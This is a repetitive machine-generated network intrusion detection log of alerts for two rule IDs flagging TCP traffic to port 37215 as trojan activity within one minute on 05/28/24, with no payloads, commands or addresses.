                  SID:2835222
                  Source Port:37608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649418
                  SID:2835222
                  Source Port:45612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584438
                  SID:2829579
                  Source Port:60650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578656
                  SID:2829579
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696293
                  SID:2835222
                  Source Port:51164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785806
                  SID:2829579
                  Source Port:42344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847290
                  SID:2835222
                  Source Port:38694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528862
                  SID:2835222
                  Source Port:58078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545060
                  SID:2829579
                  Source Port:56254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931500
                  SID:2835222
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592771
                  SID:2829579
                  Source Port:49764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695680
                  SID:2835222
                  Source Port:56784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517536
                  SID:2829579
                  Source Port:47486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817825
                  SID:2829579
                  Source Port:55394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793323
                  SID:2829579
                  Source Port:59192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536598
                  SID:2829579
                  Source Port:49154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695231
                  SID:2829579
                  Source Port:41908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775971
                  SID:2835222
                  Source Port:48758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768681
                  SID:2835222
                  Source Port:57936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920132
                  SID:2835222
                  Source Port:57800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488719
                  SID:2829579
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536548
                  SID:2835222
                  Source Port:35428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796878
                  SID:2829579
                  Source Port:44404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543492
                  SID:2829579
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318961
                  SID:2829579
                  Source Port:42704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276235
                  SID:2835222
                  Source Port:38034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799204
                  SID:2835222
                  Source Port:60296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545862
                  SID:2835222
                  Source Port:50028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857394
                  SID:2829579
                  Source Port:54764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492095
                  SID:2835222
                  Source Port:51564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888359
                  SID:2829579
                  Source Port:56976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293121
                  SID:2829579
                  Source Port:55678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537473
                  SID:2835222
                  Source Port:50846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587358
                  SID:2835222
                  Source Port:34744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911698
                  SID:2835222
                  Source Port:43008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922730
                  SID:2829579
                  Source Port:51416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293148
                  SID:2835222
                  Source Port:54580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628948
                  SID:2829579
                  Source Port:49600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292690
                  SID:2829579
                  Source Port:44158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.791037
                  SID:2835222
                  Source Port:32980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628530
                  SID:2829579
                  Source Port:55600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590453
                  SID:2829579
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316577
                  SID:2835222
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769279
                  SID:2835222
                  Source Port:48190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911136
                  SID:2829579
                  Source Port:54278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846608
                  SID:2829579
                  Source Port:43094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912247
                  SID:2829579
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483002
                  SID:2835222
                  Source Port:47026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887017
                  SID:2835222
                  Source Port:45260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536751
                  SID:2835222
                  Source Port:34220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584580
                  SID:2829579
                  Source Port:58150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661689
                  SID:2829579
                  Source Port:56396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887137
                  SID:2829579
                  Source Port:34272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651019
                  SID:2835222
                  Source Port:51084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847354
                  SID:2835222
                  Source Port:53284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650844
                  SID:2829579
                  Source Port:56536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488816
                  SID:2829579
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889479
                  SID:2829579
                  Source Port:39066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696301
                  SID:2835222
                  Source Port:47738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489839
                  SID:2829579
                  Source Port:59978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788079
                  SID:2835222
                  Source Port:55144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926510
                  SID:2829579
                  Source Port:54110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545095
                  SID:2835222
                  Source Port:48962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547381
                  SID:2835222
                  Source Port:49574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695245
                  SID:2835222
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.523570
                  SID:2829579
                  Source Port:48044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607399
                  SID:2829579
                  Source Port:36346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530513
                  SID:2829579
                  Source Port:55694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.931659
                  SID:2835222
                  Source Port:58234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920402
                  SID:2835222
                  Source Port:34020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888035
                  SID:2829579
                  Source Port:55110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906780
                  SID:2835222
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278396
                  SID:2829579
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874016
                  SID:2835222
                  Source Port:33326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578898
                  SID:2829579
                  Source Port:44904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491982
                  SID:2829579
                  Source Port:38072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323034
                  SID:2829579
                  Source Port:43240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785629
                  SID:2829579
                  Source Port:58738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2829579
                  Source Port:36746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780854
                  SID:2835222
                  Source Port:37082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591443
                  SID:2829579
                  Source Port:45690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316548
                  SID:2835222
                  Source Port:49588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886284
                  SID:2829579
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719868
                  SID:2829579
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.588000
                  SID:2829579
                  Source Port:50334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628403
                  SID:2829579
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283826
                  SID:2829579
                  Source Port:56242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.544604
                  SID:2835222
                  Source Port:34608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742603
                  SID:2835222
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720259
                  SID:2835222
                  Source Port:60288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542791
                  SID:2835222
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790201
                  SID:2835222
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586977
                  SID:2835222
                  Source Port:51808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489188
                  SID:2835222
                  Source Port:59106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371975
                  SID:2835222
                  Source Port:38134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.805326
                  SID:2829579
                  Source Port:34958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604372
                  SID:2835222
                  Source Port:56106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607266
                  SID:2829579
                  Source Port:37598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790273
                  SID:2835222
                  Source Port:55588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859306
                  SID:2829579
                  Source Port:50574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585032
                  SID:2829579
                  Source Port:45070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587951
                  SID:2829579
                  Source Port:58378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629254
                  SID:2835222
                  Source Port:35830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718816
                  SID:2829579
                  Source Port:43546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920019
                  SID:2829579
                  Source Port:40942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296752
                  SID:2829579
                  Source Port:39368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661019
                  SID:2835222
                  Source Port:53206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517515
                  SID:2835222
                  Source Port:32968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587047
                  SID:2835222
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.879989
                  SID:2829579
                  Source Port:49484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771124
                  SID:2829579
                  Source Port:60016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298960
                  SID:2835222
                  Source Port:56338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661662
                  SID:2829579
                  Source Port:39258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695427
                  SID:2835222
                  Source Port:39070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604402
                  SID:2835222
                  Source Port:42930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922740
                  SID:2829579
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845223
                  SID:2835222
                  Source Port:33346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781194
                  SID:2829579
                  Source Port:38498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915733
                  SID:2835222
                  Source Port:57470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627926
                  SID:2835222
                  Source Port:35738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664467
                  SID:2829579
                  Source Port:50348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585572
                  SID:2835222
                  Source Port:44110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659666
                  SID:2829579
                  Source Port:41820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488075
                  SID:2835222
                  Source Port:42542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785691
                  SID:2835222
                  Source Port:49990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293763
                  SID:2835222
                  Source Port:50004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920467
                  SID:2829579
                  Source Port:39062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900432
                  SID:2829579
                  Source Port:60390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651194
                  SID:2835222
                  Source Port:48312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627813
                  SID:2829579
                  Source Port:47552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316356
                  SID:2829579
                  Source Port:56080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911678
                  SID:2829579
                  Source Port:40932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887419
                  SID:2829579
                  Source Port:33150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907387
                  SID:2835222
                  Source Port:47952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821083
                  SID:2835222
                  Source Port:36944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695777
                  SID:2829579
                  Source Port:37256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768688
                  SID:2835222
                  Source Port:54478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923926
                  SID:2829579
                  Source Port:60822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.324230
                  SID:2829579
                  Source Port:60692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315748
                  SID:2835222
                  Source Port:33818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629671
                  SID:2829579
                  Source Port:49516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912131
                  SID:2829579
                  Source Port:42116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.511583
                  SID:2835222
                  Source Port:33192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628774
                  SID:2829579
                  Source Port:60886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742257
                  SID:2829579
                  Source Port:53238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664869
                  SID:2835222
                  Source Port:44298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673808
                  SID:2829579
                  Source Port:42190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845250
                  SID:2829579
                  Source Port:36866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908513
                  SID:2829579
                  Source Port:57442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293151
                  SID:2829579
                  Source Port:58204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496206
                  SID:2829579
                  Source Port:42618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299026
                  SID:2835222
                  Source Port:49200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837201
                  SID:2835222
                  Source Port:51278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866468
                  SID:2829579
                  Source Port:57464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530460
                  SID:2829579
                  Source Port:33328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.546737
                  SID:2829579
                  Source Port:53848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656321
                  SID:2829579
                  Source Port:44238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607190
                  SID:2829579
                  Source Port:49652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659733
                  SID:2829579
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555331
                  SID:2829579
                  Source Port:38674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628302
                  SID:2835222
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661697
                  SID:2835222
                  Source Port:38824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277628
                  SID:2829579
                  Source Port:52778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487982
                  SID:2835222
                  Source Port:37834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787961
                  SID:2829579
                  Source Port:41960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888306
                  SID:2835222
                  Source Port:41928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927116
                  SID:2829579
                  Source Port:38828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591097
                  SID:2835222
                  Source Port:33300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300995
                  SID:2835222
                  Source Port:43562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604089
                  SID:2835222
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847705
                  SID:2835222
                  Source Port:60734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.683158
                  SID:2835222
                  Source Port:58542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496073
                  SID:2829579
                  Source Port:44204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753911
                  SID:2829579
                  Source Port:46322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.875552
                  SID:2835222
                  Source Port:41712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547325
                  SID:2829579
                  Source Port:40258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881161
                  SID:2829579
                  Source Port:40832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912259
                  SID:2835222
                  Source Port:56778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661554
                  SID:2829579
                  Source Port:50216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628508
                  SID:2835222
                  Source Port:45310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886199
                  SID:2829579
                  Source Port:55020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695780
                  SID:2829579
                  Source Port:56280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775873
                  SID:2835222
                  Source Port:56036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
